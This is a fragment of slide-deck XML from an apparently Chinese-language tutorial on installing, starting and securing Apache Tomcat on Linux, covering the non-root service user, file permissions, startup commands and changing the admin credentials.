                <a:close/>
              </a:path>
              <a:path w="7166609" h="379094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7166609" h="379094">
                <a:moveTo>
                  <a:pt x="7156551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7156551" y="369328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7156551" y="374091"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="7166609" h="379094">
                <a:moveTo>
                  <a:pt x="7166076" y="374091"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7156551" y="374091"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7161314" y="369328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7166076" y="369328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7166076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280" y="2994660"/>
            <a:ext cx="7157084" cy="647700"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="7157084" h="647700">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7156704" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7156704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3403" y="2990557"/>
            <a:ext cx="7166609" cy="655955"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="7166609" h="655954">
                <a:moveTo>
                  <a:pt x="7161314" y="655853"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4762" y="655853"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3289" y="655624"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1968" y="654939"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="914" y="653884"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="241" y="652564"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="651090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46328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4762" y="646328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="651090"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7166076" y="651090"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7165835" y="652564"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7165162" y="653884"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7164108" y="654939"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7162787" y="655624"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7161314" y="655853"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="7166609" h="6559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655954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655954">
                <a:moveTo>
                  <a:pt x="7156551" y="651090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646328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7161314" y="646328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7156551" y="651090"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="7166609" h="655954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655954">
                <a:moveTo>
                  <a:pt x="9525" y="651090"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4762" y="646328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="646328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="651090"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="7166609" h="655954">
                <a:moveTo>
                  <a:pt x="7156551" y="651090"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9525" y="651090"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="646328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7156551" y="646328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7156551" y="651090"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="7166609" h="655954">
                <a:moveTo>
                  <a:pt x="7166076" y="651090"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7156551" y="651090"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7161314" y="646328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7166076" y="646328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7166076" y="651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8280" y="4302252"/>
            <a:ext cx="7157084" cy="370840"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="7157084" h="370839">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7156704" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="715670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3403" y="4297870"/>
            <a:ext cx="7166609" cy="379095"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="7166609" h="379095">
                <a:moveTo>
                  <a:pt x="7161314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68" y="377951"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="914" y="376897"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="241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7166076" y="374091"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7165835" y="375564"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7165162" y="376897"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7164108" y="377951"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7162787" y="378625"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7161314" y="378853"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="7166609" h="37909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379095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379095">
                <a:moveTo>
                  <a:pt x="7156551" y="374091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369328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7161314" y="369328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7156551" y="374091"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="7166609" h="379095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379095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7166609" h="379095">
                <a:moveTo>
                  <a:pt x="7156551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7156551" y="369328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7156551" y="374091"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="7166609" h="379095">
                <a:moveTo>
                  <a:pt x="7166076" y="374091"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7156551" y="374091"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7161314" y="369328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7166076" y="369328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7166076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851" y="1458055"/>
            <a:ext cx="5054600" cy="316611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0"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="3422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服务器启动的权限</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="5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root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启动不安全）</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Noto Sans CJK JP Regular"/>
              <a:cs typeface="Noto Sans CJK JP Regular"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marR="83820" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="810"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="2851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Linux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如果使用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yum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apt-get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安装，会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建</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Noto Sans CJK JP Regular"/>
              <a:cs typeface="Noto Sans CJK JP Regular"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="929640">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="484"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" b="1" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>tomcat:x:91:91:Apache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Tomcat:/u</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marR="83185" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="885"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="2851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systemctl start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tomcat.service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启动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endParaRPr sz="1600">
              <a:latin typeface="Noto Sans CJK JP Regular"/>
              <a:cs typeface="Noto Sans CJK JP Regular"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="929640" marR="395605">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1015"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="3114675" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" b="1" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>/usr/lib/systemd/system/tomcat.se  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" b="1" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t># ps </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" b="1" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>-ef|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grep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java	</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="10" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>可以查</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>看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配置文件（默认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/etc/tomcat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  <a:tabLst>
                <a:tab pos="2136140" algn="l"/>
                <a:tab pos="3723640" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>drwxr-xr-x	</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="180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 root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	231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8</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>月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33746" y="1984576"/>
            <a:ext cx="3289935" cy="262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立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户</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Noto Sans CJK JP Regular"/>
              <a:cs typeface="Noto Sans CJK JP Regular"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="88900">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="484"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" b="1" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>sr/share/tomcat:/sbin/nologin</a:t>
            </a:r>
            <a:endParaRPr sz="180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以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用户运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行</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Noto Sans CJK JP Regular"/>
              <a:cs typeface="Noto Sans CJK JP Regular"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="156845">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1015"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" b="1" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>rvice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latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>14 19:23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59501" y="1845564"/>
            <a:ext cx="6970776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6376" y="1597723"/>
            <a:ext cx="1123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安装目录及权限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/usr/share/tomcat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51" y="4807013"/>
            <a:ext cx="1677962" cy="2983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进入目录：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2029459"/>
            <a:ext cx="8330183" cy="2353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1135" y="4782311"/>
            <a:ext cx="7492365" cy="1754505"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="7492365" h="1754504">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7491983" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7491983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5763" y="4777117"/>
            <a:ext cx="7501890" cy="1764030"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="7501890" h="1764029">
                <a:moveTo>
                  <a:pt x="7496975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55" y="1762950"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="901" y="1761896"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="228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7496975" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="750173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7501737" y="1759089"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7501496" y="1760562"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7500823" y="1761896"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7499769" y="1762950"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7498435" y="1763623"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7496975" y="1763852"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="7501890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501890" h="1764029">
                <a:moveTo>
                  <a:pt x="749221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492212" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7492212" y="9525"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="7501890" h="1764029">
                <a:moveTo>
                  <a:pt x="7492212" y="1759089"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7492212" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7496975" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7501737" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7501737" y="1754327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7496975" y="1754327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7492212" y="1759089"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="7501890" h="1764029">
                <a:moveTo>
                  <a:pt x="7501737" y="9525"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7496975" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7492212" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7501737" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7501737" y="9525"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="7501890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7501890" h="1764029">
                <a:moveTo>
                  <a:pt x="7492212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7492212" y="1754327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7492212" y="1759089"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="7501890" h="1764029">
                <a:moveTo>
                  <a:pt x="7501737" y="1759089"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7492212" y="1759089"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7496975" y="1754327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7501737" y="1754327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7501737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21966" y="4803470"/>
            <a:ext cx="62103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34104">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="1116965" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>#cd bin	</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>可执行文件 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>[root@localhost bin]# </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>ls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-l  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>总用量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72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-rw-r--r-- 1 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>root tomcat 27903 7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27 19:03</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-3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bootstrap.jar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-rw-r--r-- 1 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>root tomcat 1647 7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27 19:02</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-3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catalina-tasks.xml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145665" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>-rw-r--r-- 1 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>root root	38551 7 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>月 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>27 19:03</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-3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tomcat-juli.jar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447903"/>
            <a:ext cx="10124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修改</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-240" dirty="0">
                <a:latin typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
              </a:rPr>
              <a:t>T</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:latin typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
              </a:rPr>
              <a:t>o</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="5" dirty="0">
                <a:latin typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
              </a:rPr>
              <a:t>m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spc="-65" dirty="0">
                <a:latin typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
              </a:rPr>
              <a:t>a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/>
              <a:t>服务器后台管理地址和管理账号密码</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1246632" y="2775204"/>
            <a:ext cx="7157084" cy="923925"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="7157084" h="923925">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7156704" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7156704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2288" y="2770517"/>
            <a:ext cx="7166609" cy="933450"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="7166609" h="933450">
                <a:moveTo>
                  <a:pt x="7161314" y="932853"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4762" y="932853"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3289" y="932624"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1968" y="931951"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="914" y="930897"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="241" y="929563"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="928090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23328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4762" y="923328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="928090"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7166076" y="928090"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7165848" y="929563"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7165162" y="930897"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7164108" y="931951"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7162787" y="932624"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7161314" y="932853"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="7166609" h="933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933450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933450">
                <a:moveTo>
                  <a:pt x="7156551" y="928090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923328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7161314" y="923328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7156551" y="928090"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="7166609" h="933450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933450">
                <a:moveTo>
                  <a:pt x="9525" y="928090"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4762" y="923328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="923328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="928090"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="7166609" h="933450">
                <a:moveTo>
                  <a:pt x="7156551" y="928090"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9525" y="928090"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="923328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7156551" y="923328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7156551" y="928090"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="7166609" h="933450">
                <a:moveTo>
                  <a:pt x="7166076" y="928090"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7156551" y="928090"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7161314" y="923328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7166076" y="923328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7166076" y="928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8927" y="4535423"/>
            <a:ext cx="7157084" cy="923925"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="7157084" h="923925">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7156704" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7156704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4355" y="4530661"/>
            <a:ext cx="7166609" cy="933450"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="7166609" h="933450">
                <a:moveTo>
                  <a:pt x="7161301" y="932853"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4762" y="932853"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3289" y="932624"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1968" y="931938"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="914" y="930884"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="228" y="929563"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="928090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23328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4762" y="923328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="928090"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7166063" y="928090"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7165835" y="929563"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7165162" y="930884"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7164108" y="931938"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7162774" y="932624"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7161301" y="932853"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="7166609" h="933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933450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923328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7161301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933450">
                <a:moveTo>
                  <a:pt x="9525" y="928090"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4762" y="923328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="923328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="928090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9525" y="928090"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="923328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7156538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28090"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7156538" y="928090"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7161301" y="923328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7166063" y="923328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7166063" y="928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1452250"/>
            <a:ext cx="8894445" cy="395351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下载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安装</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Noto Sans CJK JP Regular"/>
              <a:cs typeface="Noto Sans CJK JP Regular"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="755650" marR="5080" indent="-28575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wget </a:t>
            </a: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2"/>
              </a:rPr>
              <a:t>http://mirrors.hust.edu.cn/apache/tomcat/tomcat-8/v8.5.20/bin/apache-tomcat-8.5.20- </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="6B9F24"/>
                </a:solidFill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fulldocs.tar.gz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#cd /usr/local/</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="698500" marR="3526154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#mv </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-10" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>apache-tomcat-8.5.20.tar.gz </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>tomcat8520  #chgrp tomcat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tomcat8520/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快速启动（不做其他配置）</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Noto Sans CJK JP Regular"/>
              <a:cs typeface="Noto Sans CJK JP Regular"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="780415" marR="5069840">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1470"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>#cd /usr/local/tomcat8520/bin  #./startup.sh</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="78041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#netstat –lanp </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>|</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> 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4084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以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>
                <a:latin typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
              </a:rPr>
              <a:t>o</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="5" dirty="0">
                <a:latin typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
              </a:rPr>
              <a:t>m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spc="-65" dirty="0">
                <a:latin typeface="Arial Black"/>
